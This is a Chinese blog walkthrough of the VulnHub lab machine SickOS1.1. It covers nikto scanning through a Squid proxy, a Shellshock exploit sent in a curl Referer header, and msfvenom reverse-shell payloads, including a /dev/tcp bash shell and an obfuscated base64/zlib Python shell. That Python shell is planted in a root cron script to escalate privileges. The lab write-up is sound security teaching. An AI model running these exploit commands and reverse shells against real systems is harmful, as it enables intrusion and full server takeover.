「红队笔记」靶机精讲:SickOS1.1 - Shellshock原理和利用过程精讲

最新推荐文章于 2024-07-14 11:42:14 发布
最新推荐文章于 2024-07-14 11:42:14 发布
阅读量918 收藏 17
点赞数 23
分类专栏: 红队笔记 文章标签: 网络安全 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73612768/article/details/134694863
版权

靶机精讲之SickOS1.1,vulnhub靶机,需要配置代理,穿越Squid实现对CMS渗透,shellshock是本机的重要利用路径,本视频详细分析了shellshock的原理,展示了利用过程,希望借此靶机完全吃透shellshock这种利用。此为本机打法二。

​ ------《红队笔记》

在第一种解法中得知靶机有三个端口:22,3128,8080。

3128 端口的代理服务器可以被攻击者使用。

nikto 漏洞扫描
sudo nikto -h 10.10.10.19 -useproxy http://10.10.10.19:3128

Nikto 工具是一款常用的 Web 应用程序扫描工具,能够探测服务器漏洞,检测 SQL 注入、XSS 、文件包含和命令注入等 Web 安全问题。

-h (host) :指定目标主机的 IP 地址。

-useproxy:使用 HTTP 代理服务器,将所有的请求和响应通过代理服务器转发。

在扫描结果中,可以发现爆出了一个 shellshock 漏洞:

在这里插入图片描述

shellshock 漏洞的利用
关于 shellshock 漏洞

Shellshock ,又称 Bashdoor ,是在 Unix 中广泛使用的 Bash shell 中的一个安全漏洞,首次于2014年9月24日公开。

curl 漏洞测试
sudo curl -v --proxy http://10.10.10.19:3128 http://10.10.10.19/cgi-bin/status -H "Referer:() { test;}; echo 'Content-Type: text/plain'; echo; echo; /usr/bin/id;exit"

  • curl: 使用 curl 工具发起 HTTP 请求

  • -v: 详细输出请求过程的信息

  • --proxy http://10.10.10.19:3128: 配置代理服务器地址和端口号

  • http://10.10.10.19/cgi-bin/status: 请求的目标 URL

  • -H "Referer:() { test;}; echo 'Content-Type: text/plain'; echo; echo; /usr/bin/id;exit": 设置请求头,其中 “ Referer ” 字段中注入了一个恶意的环境变量,用于执行在 Bash shell 环境下的 id 命令。

  • -H: 表示设置 HTTP 请求的头部信息

  • () { test;}: 这是一个恶意的定义函数的语句,意思是" 定义一个函数 test "

  • echo 'Content-Type: text/plain';: 表示输出 “ Content-Type: text/plain ” ,作为 HTTP 响应的头部信息的一部分

  • echo; echo;: 表示输出两个空行,也是为了协议要求的 HTTP 响应头和正文之间需要空一行的要求

  • /usr/bin/id: 表示执行一个系统命令,这里是查看当前用户身份的 id 命令

  • exit: 表示退出 Bash 解释器。由于该环境变量采用 Bash 语法,Bash 在执行完 id 命令后就会解析到该 exit 命令,随即会退出 Bash 解释器,终止命令的执行。

最终效果是,攻击者的指令将被注入到目标服务器的 HTTP 请求头中,服务器在解析请求头时会执行其中的恶意函数,然后执行 echo 命令输出 HTTP 响应头,并执行 id 命令查看当前用户身份,最后退出 Shell。

在结果中成功返回用户 id 及属组:

在这里插入图片描述

说明漏洞测试成功,这个 shellshock 漏洞可以被利用。

渗透测试
msfvenom 生成 payload

顺带一提,如果没有安装 metasploit-framework 的话,在使用这条命令之前需要先安装一下:

apt install metasploit-framework

sudo msfvenom -p cmd/unix/reverse_bash lhost=10.10.10.3 lport=443 -f raw

这是一条用msfvenom工具生成 Metasploit 负载的命令。以下是该命令的详细解释:

  1. sudo 指令被用来提升权限,通常需要系统管理员权限才能运行msfvenom
  2. msfvenom 是 Metasploit Framework 中的一个 Payload 生成工具,用于生成指定漏洞利用的 Payloads 。本例中使用 msfvenom 命令生成一个负载 (payload), 这个负载是一个用于反向连接的 Bash shell(命令行解释器)。
  3. -p cmd/unix/reverse_bash指定了使用反向 Bash shell 作为负载类型。这个负载将会被包含在漏洞利用程序中,在利用某些漏洞时被远程执行。
  4. lhost=10.10.10.3用来指定监听的本地 IP 地址,即攻击者的 IP 地址。在反向连接时,被攻击者机器将会连接到这个 IP。
  5. lport=443指定监听的本地端口号,即要监听的 TCP 端口号。这个端口是指定的反向连接的端口号。正常情况下,443 端口是 HTTPS 协议的默认端口,用途是加密 Web 传输的内容。
  6. -f raw用于生成输出的格式,指定文件输出格式为“原始数据”(raw),即没有经过编码和压缩的二进制数据,常常会被作为负载文件使用。

综上所述,这条命令的作用是生成一个反向连接的 Bash shell 的 Metasploit 负载,该负载可以被集成在攻击 Veil 的生成攻击向量的过程中使用,作为渗透测试实验中利用漏洞执行代码的一种手段。

所生成的反弹 shell 的语句是:

bash -c '0<&171-;exec 171<>/dev/tcp/10.10.10.3/443;sh <&171 >&171 2>&171'

这条命令的目的是通过与远程主机建立 TCP 连接,将本地的标准输入、输出和错误输出都重定向到该 TCP 连接上。这样可以实现远程控制该主机的功能。

值得注意的是,这里的 sh 最好使用绝对路径 /bin/sh

反弹 shell

开启监听:

sudo nc -lvnp 443

发送攻击语句:

sudo curl -v --proxy http://10.10.10.19:3128 http://10.10.10.19/cgi-bin/status -H "Referer:() { test;}; bash -c '0<&171-;exec 171<>/dev/tcp/10.10.10.3/443;/bin/sh <&171 >&171 2>&171'"

成功拿到 shell 。

但是这个 shell 的交互性并不好,输入命令时前面没有命令提示符。

提高交互性

通过 dpkg -l 查看系统安装了哪些软件,发现安装了 python 。

为了提高交互性,我们输入以下命令:

python -c "import pty;pty.spawn('/bin/bash')"

就可以有命令提示符出来了。

这条命令使用了 Python 的pty模块,通过pty.spawn()方法可以创建一个终端窗口,并且将其连接到一个指定的命令中。在这个指令中,该命令是/bin/bash,也就是开启一个新的 Bash 终端。

crontab 自动任务

进入网站的目录下:cd /var/www

查看 connect.py 文件。

frequently 频繁的,联想到自动任务。

crontab 是 Linux 上一个跟自动任务有关的命令,其配置文件在 /etc/cron* ,即 /etc/ 目录下以 cron 开头的各种文件。

在/etc目录下有一个cron.d文件夹,这个就是系统任务调度的配置文件。

cd /etc

ls -liah cron*
  • -l: 参数,显示长格式列表
  • -i: 参数,显示inode编号
  • -a: 参数,显示所有文件,包括隐藏文件
  • -h: 参数,人性化地显示文件大小

最终发现 /etc/cron.d/automate 文件里面包含了自动任务的相关信息:

# /etc/cron.d/automate 文件内容
* * * * * root /usr/bin/python /var/www/connect.py

意思是每分钟以 root 权限调用 /usr/bin/python 程序执行 /var/www/connect.py 文件。

那么只需要在 /var/www/connect.py 中插入攻击语句就可以了。

再次使用 msfvenom 生成 payload

要生成一个可以被 Python 执行的反弹 shell 的语句,所以这次的命令有点不一样:

sudo msfvenom -p cmd/unix/reverse_python Lhost=10.10.10.3 lport=444 -f raw

输出结果:

python -c "exec(__import__('zlib').decompress(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('eNqNkEELwjAMhf9K6akFqdvcTXoYMkFEBbf7cLWy4WzK0v1/qS1IbwuF8JIv70HHj4XZEQT11o742pBQuPR2BqURkzH85J4MgE7SPBPh7WgYezdZlmVQKIOxCI1FVR2707Vu07iwam6Hc9e097q68OghFBijlWPMZyZHPo1HDlA8F1swFK9x0gYYT9BsHZavw4qIWfn/JqEe08Toth/NFgfKv51ZWcQ=')[0])))"

但是我们只取双引号里面的即可:

exec(import(‘zlib’).decompress(import(‘base64’).b64decode(import(‘codecs’).getencoder(‘utf-8’)(‘eNqNkEELwjAMhf9K6akFqdvcTXoYMkFEBbf7cLWy4WzK0v1/qS1IbwuF8JIv70HHj4XZEQT11o742pBQuPR2BqURkzH85J4MgE7SPBPh7WgYezdZlmVQKIOxCI1FVR2707Vu07iwam6Hc9e097q68OghFBijlWPMZyZHPo1HDlA8F1swFK9x0gYYT9BsHZavw4qIWfn/JqEe08Toth/NFgfKv51ZWcQ=’)[0])))

将 payload 插入到 /var/www/connect.py 文件中,同时 kali 开启 nc 监听。

这样最多等待一分钟,当自动任务执行的时候,shell 就被反弹回来了。

妙尽璇机
关注
  • 23
    点赞
  • 17
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
打靶:SickOS1.1详细打靶思路之shellshock漏洞利用(vulnhub)
Bossfrank的博客
06-08 617
本文详述了vulnhub靶机sickOS1.1的打靶过程。本文利用了bash漏洞shellshock获取初始立足点,并使用定时任务进行提权。不同于单纯的writeup,本文更注重打靶每一步的思路用意。本文涉及的知识点包括nikto扫描、shellshock漏洞利用、msfvenom生成payload、定时任务提权等。采用squid代理分析+web渗透cms后台获取root权限的思路详见我的上一篇博客。
笔记3-SickOS1.1打靶流程解法1-穿越Squid代理的CMS渗透(vulnhub)
qq_63442530的博客
03-15 1091
1.端口扫描:发现存活端口:22 ,3128(squid-http) ,8080,其中squid-http是个代理服务器2.开始访问3128,8080都访问不到,目录扫描也扫描不出结果,根据我们知道squid是个代理服务器,尝试Dirb -p参数,挂代理目录爆破,成功扫出来一些路径。然后浏览器设置代理访问,找到了wolfcms的页面。3.通过浏览器获得wolfcms后台路径,通过弱口令登录后台,寻找后台代码执行和文件上传的位置,构造反弹命令写入代码执行,反弹shell。
渗透靶场之SickOs1.1
xf555er的博客
12-06 1058
shellshock即unix系统下的bash shell的一个漏洞, Bash 4.3以及之前的版本在处理某些构造的环境变量时存在安全漏洞, 向环境变量值内的函数定义后添加多余的字符串会触发此漏洞, 攻击者可利用此漏洞改变或绕过环境限制,以执行任意的shell命令,甚至完全控制目标系统bash使用的环境变量是通过函数名称来调用的,以""开头通过环境变量来定义,而在处理这样的恶意的函数环境变量时,并没有以函数结尾 “” 为结束,而是执行其后的恶意shell命令执行CGI 时会调用Bash将Referer、h
笔记4-SickOS1.1打靶流程解法2-nikto漏扫 shellshock漏洞利用(vulnhub)
qq_63442530的博客
03-16 1081
1.端口扫描:发现存活端口:22 ,3128(squid-http) ,8080,其中squid-http是个代理服务器2.开始访问3128,8080都访问不到,目录扫描也扫描不出结果,根据我们知道squid是个代理服务器,尝试Dirb -p参数,挂代理目录爆破,成功扫出来一些路径。其中cgi-bin目录可能存在漏洞,使用nikto漏扫工具,发现shellshock漏洞3.漏洞利用:用msfvenom生成反弹shell的payload,成功获得初始立足点www-data的shell。
打靶:SickOS1.1详细打靶思路(vulnhub)
Bossfrank的博客
06-07 1327
本文是vulnhub靶机sickos详细打靶过程,使用kali进行渗透。不同于单纯的writeup,本文详细提供了渗透的思路和每一步的用意。本文使用了squid代理分析+wolfcms渗透的思路获取shell。下一篇文章将详述利用shellshock漏洞进行渗透的思路。
打靶:vulnhub中的SickOS1.1
qq_73865998的博客
04-10 1871
复现视频:【「笔记靶机SickOS1.1 - Shellshock原理利用过程】https://www.bilibili.com/video/BV14e4y1n7ua?是自带的一个web漏洞扫描器,可以识别目标网站,服务器上存在安全隐患的漏洞利用nikto去扫描网站是否有漏洞,有个shellshock漏洞。shellshock详细介绍用curl测试有否有shellshock漏洞。
vulnHub-sick0s1.1学习 两种解法
m0_50431798的博客
06-07 1107
查看cat /etc/shadow说是权限不足,那就提权,使用sudo -l查看权限,全all,那就可以使用sudo su提权,提权后再查看/etc/shadow文件。通过这个可以确定用户名大概率是admin,但是密码不清楚,那就尝试弱口令,弱口令不可以就进行爆破,不过这个尝试5次失败就会禁止30秒,可以通过其他方式进行绕过。使用dirsearch扫描可以看到/index.php/login/ ,一个登录链接。查看passwd表可以看到有/bin/bash的用户有root,sickos
笔记:技巧,窍门和技巧的串联
02-25
笔记 提示,技巧和技巧的串联。 当前主题:文件传输
Goby-win-x64-2.4.7版本
07-27
Goby专版:集成1500个poc和exp ,覆盖普通版本所有功能,开箱即用 使用方式: 解压后双击goby.exe运行即可 注意事项: 最新的漏洞不可以在线更新,可自行添加poc和exp 重要的事情说三遍 不要用于非法或未授权...
Impost3r::ghost:Impost3r-一个Linux密码小偷
01-30
...通过伪装成系统的一部分,Impost3r能够捕获高...了解其工作原理和防范措施,有助于提升系统安全性。同时,使用此类工具应遵循道德和法律规范,确保测试活动的合法性。在安全领域,保持警惕和不断学习是至关重要的。
GOBY 版 GOBY205REDTEAM-1288-POCS-by-hlop-orz-zen
11-16
【标题】"GOBY 版"指的是一个针对操作的工具包或软件版本,名为GOBY,特别标记为205REDTEAM,版本号为1288,由hlop_orz_zen进行POCS(Proof of Concept,概念验证)开发。这个版本可能是一个定制的安全测试...
nishang:Nishang-用于,渗透测试和进攻安全的进攻性PowerShell
02-05
Nishang是一个专门为(Red Team)操作、渗透测试和攻击安全设计的高级PowerShell框架。这个工具集提供了一系列的脚本和模块,旨在帮助安全专家和研究人员模拟攻击者的行为,评估网络防御的有效性,并在合法的...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8335
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
微信小程序开发笔记之”表单读不出数据“解决指南
qq_46396470的博客
07-12 316
脑瓜子好了后,忘记了表单控件必须要加上。提交后打印的字典是空的,卡了十几分钟。
mysql笔记1
m0_62975692的博客
07-11 386
首先查看systemctl status mysqld,如果是关闭的可以进入的配置文件打开mysql,我的mysql配置文件就是在/usr/local/mysql/support-filess/下,在此目录下执行./mysql.server start,打开mysql服务,也可以通过systmectl start mysqld,如果你嫌麻烦的话可以systemctl enable mysqld 一直打开mysql的服务;重新给字段添加约束的时候不可以添加not null约束的!
算法刷题笔记 KMP字符串(C++实现,并给出了求next数组的独家简单理解方式)
hanmo22357的博客
07-12 812
一道经典且较难的算法题,给出了C++代码实现,以及自己对next数组求解的独家简单的理解方式。
java Web学习笔记(三)
qq_62678419的博客
07-12 1035
java 前端工程框架 vue3 包括以下依赖的学习 vite npm router axios
OpenGL笔记十一之Uniform变量及实现一个颜色忽明忽暗的三角形
最新发布
小勇博客
07-14 315
— 2024-07-14 上午。
Plano de Estudos Cyber Security - Parte 1 Red Team.pdf
10-06
O "Plano de Estudos Cyber Security - Parte 1 Red Team.pdf" é um recurso elaborado por Joas Antonio, voltado para auxiliar os estudos em segurança cibernética, ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值